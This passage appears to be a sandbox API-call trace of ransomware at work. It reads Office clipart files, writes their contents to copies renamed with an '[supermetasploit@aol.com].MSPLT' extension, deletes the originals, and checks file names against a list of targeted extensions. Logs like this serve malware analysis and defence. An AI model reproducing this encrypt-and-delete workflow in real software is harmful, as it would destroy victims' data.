[0295.978] SetEndOfFile (hFile=0x44c) returned 1 [0295.979] CloseHandle (hObject=0x44c) returned 1 [0295.985] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0295.985] SetEndOfFile (hFile=0x3d0) returned 1 [0295.990] CloseHandle (hObject=0x3d0) returned 1 [0295.991] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06102_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0295.991] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06102_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd06102_.wmf")) returned 1 [0295.992] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 68 [0295.992] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 68 [0295.992] lstrlenW (lpString=".doc") returned 4 [0295.992] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0295.992] lstrlenW (lpString=".docx") returned 5 [0295.992] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0295.992] lstrlenW (lpString=".pdf") returned 4 [0295.992] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0295.992] lstrlenW (lpString=".xls") returned 4 [0295.992] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0295.992] lstrlenW (lpString=".xlsx") returned 5 [0295.993] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0295.993] lstrlenW (lpString=".ppt") returned 4 [0295.993] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0295.993] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 68 [0295.993] lstrlenW (lpString=".zip") returned 4 [0295.993] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0295.993] lstrlenW (lpString=".rar") returned 4 [0295.993] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0295.993] lstrlenW (lpString=".bz2") returned 4 [0295.993] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0295.993] lstrlenW (lpString=".7z") returned 3 [0295.993] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0295.993] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 68 [0295.993] lstrlenW (lpString=".dbf") returned 4 [0295.993] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0295.993] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 68 [0295.993] lstrlenW (lpString=".1cd") returned 4 [0295.993] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0295.993] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 68 [0295.993] lstrlenW (lpString=".jpg") returned 4 [0295.993] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0295.993] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 68 [0295.993] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 68 [0295.994] lstrlenW (lpString=".doc") returned 4 [0295.994] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0295.994] lstrlenW (lpString=".docx") returned 5 [0295.994] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0295.994] lstrlenW (lpString=".pdf") returned 4 [0295.994] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0295.994] lstrlenW (lpString=".xls") returned 4 [0295.994] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0295.994] lstrlenW (lpString=".xlsx") returned 5 [0295.994] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0295.994] lstrlenW (lpString=".ppt") returned 4 [0295.994] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0295.994] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 68 [0295.994] lstrlenW (lpString=".zip") returned 4 [0295.994] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0295.994] lstrlenW (lpString=".rar") returned 4 [0295.994] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0295.994] lstrlenW (lpString=".bz2") returned 4 [0295.994] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0295.994] lstrlenW (lpString=".7z") returned 3 [0295.994] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0295.994] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 68 [0295.994] lstrlenW (lpString=".dbf") returned 4 [0295.994] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0295.994] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 68 [0295.994] lstrlenW (lpString=".1cd") returned 4 [0295.995] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0295.995] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 68 [0295.995] lstrlenW (lpString=".jpg") returned 4 [0295.995] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0295.995] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0295.995] lstrlenW (lpString="BD06200_.WMF") returned 12 [0295.995] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06200_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd06200_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0 [0295.996] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0x298ff14 | out: lpFileSize=0x298ff14*=16676) returned 1 [0295.996] CloseHandle (hObject=0x3d0) returned 1 [0295.996] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06200_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd06200_.wmf")) returned 0x220 [0295.996] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06200_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd06200_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0295.997] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06200_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd06200_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0 [0295.997] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0295.997] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0295.997] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06200_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd06200_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0295.998] GetLastError () returned 0x0 [0295.998] ReadFile (in: hFile=0x3d0, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0x4124, lpOverlapped=0x0) returned 1 [0296.350] WriteFile (in: hFile=0x44c, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0x4130, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0x4130, lpOverlapped=0x0) returned 1 [0296.351] ReadFile (in: hFile=0x3d0, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0x0, lpOverlapped=0x0) returned 1 [0296.352] WriteFile (in: hFile=0x44c, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0xec, lpOverlapped=0x0) returned 1 [0296.352] SetEndOfFile (hFile=0x44c) returned 1 [0296.358] CloseHandle (hObject=0x44c) returned 1 [0296.360] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0296.360] SetEndOfFile (hFile=0x3d0) returned 1 [0296.399] CloseHandle (hObject=0x3d0) returned 1 [0296.399] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06200_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0296.400] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06200_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd06200_.wmf")) returned 1 [0296.401] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06200_.WMF") returned 68 [0296.401] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06200_.WMF") returned 68 [0296.401] lstrlenW (lpString=".doc") returned 4 [0296.401] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0296.401] lstrlenW (lpString=".docx") returned 5 [0296.401] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0296.401] lstrlenW (lpString=".pdf") returned 4 [0296.401] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0296.401] lstrlenW (lpString=".xls") returned 4 [0296.401] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0296.401] lstrlenW (lpString=".xlsx") returned 5 [0296.401] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0296.401] lstrlenW (lpString=".ppt") returned 4 [0296.401] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0296.401] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06200_.WMF") returned 68 [0296.401] lstrlenW (lpString=".zip") returned 4 [0296.401] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0296.401] lstrlenW (lpString=".rar") returned 4 [0296.401] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0296.401] lstrlenW (lpString=".bz2") returned 4 [0296.401] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0296.401] lstrlenW (lpString=".7z") returned 3 [0296.401] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0296.401] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06200_.WMF") returned 68 [0296.402] lstrlenW (lpString=".dbf") returned 4 [0296.402] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0296.402] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06200_.WMF") returned 68 [0296.402] lstrlenW (lpString=".1cd") returned 4 [0296.402] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0296.402] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06200_.WMF") returned 68 [0296.402] lstrlenW (lpString=".jpg") returned 4 [0296.402] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0296.402] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06200_.WMF") returned 68 [0296.402] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06200_.WMF") returned 68 [0296.402] lstrlenW (lpString=".doc") returned 4 [0296.402] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0296.402] lstrlenW (lpString=".docx") returned 5 [0296.402] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0296.402] lstrlenW (lpString=".pdf") returned 4 [0296.402] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0296.402] lstrlenW (lpString=".xls") returned 4 [0296.402] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0296.402] lstrlenW (lpString=".xlsx") returned 5 [0296.402] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0296.402] lstrlenW (lpString=".ppt") returned 4 [0296.402] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0296.402] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06200_.WMF") returned 68 [0296.402] lstrlenW (lpString=".zip") returned 4 [0296.402] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0296.402] lstrlenW (lpString=".rar") returned 4 [0296.403] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0296.403] lstrlenW (lpString=".bz2") returned 4 [0296.403] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0296.403] lstrlenW (lpString=".7z") returned 3 [0296.403] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0296.403] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06200_.WMF") returned 68 [0296.403] lstrlenW (lpString=".dbf") returned 4 [0296.403] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0296.403] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06200_.WMF") returned 68 [0296.403] lstrlenW (lpString=".1cd") returned 4 [0296.403] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0296.403] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06200_.WMF") returned 68 [0296.403] lstrlenW (lpString=".jpg") returned 4 [0296.403] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0296.403] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0296.403] lstrlenW (lpString="BD07831_.WMF") returned 12 [0296.403] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07831_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd07831_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0 [0296.404] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0x298ff14 | out: lpFileSize=0x298ff14*=4066) returned 1 [0296.404] CloseHandle (hObject=0x3d0) returned 1 [0296.404] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07831_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd07831_.wmf")) returned 0x220 [0296.405] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07831_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd07831_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0296.405] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07831_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd07831_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0 [0296.405] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0296.405] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0296.405] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07831_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd07831_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c0 [0296.406] GetLastError () returned 0x0 [0296.406] ReadFile (in: hFile=0x3d0, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0xfe2, lpOverlapped=0x0) returned 1 [0296.408] WriteFile (in: hFile=0x4c0, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0xff0, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0xff0, lpOverlapped=0x0) returned 1 [0296.411] ReadFile (in: hFile=0x3d0, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0x0, lpOverlapped=0x0) returned 1 [0296.411] WriteFile (in: hFile=0x4c0, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0xec, lpOverlapped=0x0) returned 1 [0296.411] SetEndOfFile (hFile=0x4c0) returned 1 [0296.411] CloseHandle (hObject=0x4c0) returned 1 [0296.415] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0296.415] SetEndOfFile (hFile=0x3d0) returned 1 [0296.419] CloseHandle (hObject=0x3d0) returned 1 [0296.419] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07831_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0296.420] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07831_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd07831_.wmf")) returned 1 [0296.421] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07831_.WMF") returned 68 [0296.421] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07831_.WMF") returned 68 [0296.421] lstrlenW (lpString=".doc") returned 4 [0296.421] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0296.421] lstrlenW (lpString=".docx") returned 5 [0296.421] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0296.421] lstrlenW (lpString=".pdf") returned 4 [0296.421] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0296.421] lstrlenW (lpString=".xls") returned 4 [0296.421] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0296.421] lstrlenW (lpString=".xlsx") returned 5 [0296.421] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0296.421] lstrlenW (lpString=".ppt") returned 4 [0296.421] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0296.421] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07831_.WMF") returned 68 [0296.421] lstrlenW (lpString=".zip") returned 4 [0296.421] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0296.421] lstrlenW (lpString=".rar") returned 4 [0296.422] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0296.422] lstrlenW (lpString=".bz2") returned 4 [0296.422] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0296.422] lstrlenW (lpString=".7z") returned 3 [0296.422] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0296.422] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07831_.WMF") returned 68 [0296.422] lstrlenW (lpString=".dbf") returned 4 [0296.422] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0296.422] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07831_.WMF") returned 68 [0296.422] lstrlenW (lpString=".1cd") returned 4 [0296.422] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0296.422] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07831_.WMF") returned 68 [0296.422] lstrlenW (lpString=".jpg") returned 4 [0296.422] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0296.422] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07831_.WMF") returned 68 [0296.422] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07831_.WMF") returned 68 [0296.422] lstrlenW (lpString=".doc") returned 4 [0296.422] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0296.422] lstrlenW (lpString=".docx") returned 5 [0296.422] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0296.422] lstrlenW (lpString=".pdf") returned 4 [0296.423] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0296.423] lstrlenW (lpString=".xls") returned 4 [0296.423] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0296.423] lstrlenW (lpString=".xlsx") returned 5 [0296.423] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0296.423] lstrlenW (lpString=".ppt") returned 4 [0296.423] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0296.423] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07831_.WMF") returned 68 [0296.423] lstrlenW (lpString=".zip") returned 4 [0296.423] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0296.423] lstrlenW (lpString=".rar") returned 4 [0296.423] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0296.423] lstrlenW (lpString=".bz2") returned 4 [0296.423] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0296.423] lstrlenW (lpString=".7z") returned 3 [0296.423] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0296.423] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07831_.WMF") returned 68 [0296.423] lstrlenW (lpString=".dbf") returned 4 [0296.423] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0296.423] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07831_.WMF") returned 68 [0296.423] lstrlenW (lpString=".1cd") returned 4 [0296.423] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0296.423] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07831_.WMF") returned 68 [0296.423] lstrlenW (lpString=".jpg") returned 4 [0296.423] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0296.424] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0296.424] lstrlenW (lpString="BD08758_.WMF") returned 12 [0296.424] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08758_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08758_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0 [0296.425] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0x298ff14 | out: lpFileSize=0x298ff14*=24320) returned 1 [0296.425] CloseHandle (hObject=0x3d0) returned 1 [0296.425] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08758_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08758_.wmf")) returned 0x220 [0296.425] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08758_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08758_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0296.425] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08758_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08758_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0 [0296.426] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0296.426] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0296.426] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08758_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08758_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c0 [0296.427] GetLastError () returned 0x0 [0296.427] ReadFile (in: hFile=0x3d0, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0x5f00, lpOverlapped=0x0) returned 1 [0296.713] WriteFile (in: hFile=0x4c0, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0x5f10, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0x5f10, lpOverlapped=0x0) returned 1 [0296.716] ReadFile (in: hFile=0x3d0, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0x0, lpOverlapped=0x0) returned 1 [0296.716] WriteFile (in: hFile=0x4c0, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0xec, lpOverlapped=0x0) returned 1 [0296.716] SetEndOfFile (hFile=0x4c0) returned 1 [0296.717] CloseHandle (hObject=0x4c0) returned 1 [0296.720] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0296.720] SetEndOfFile (hFile=0x3d0) returned 1 [0296.726] CloseHandle (hObject=0x3d0) 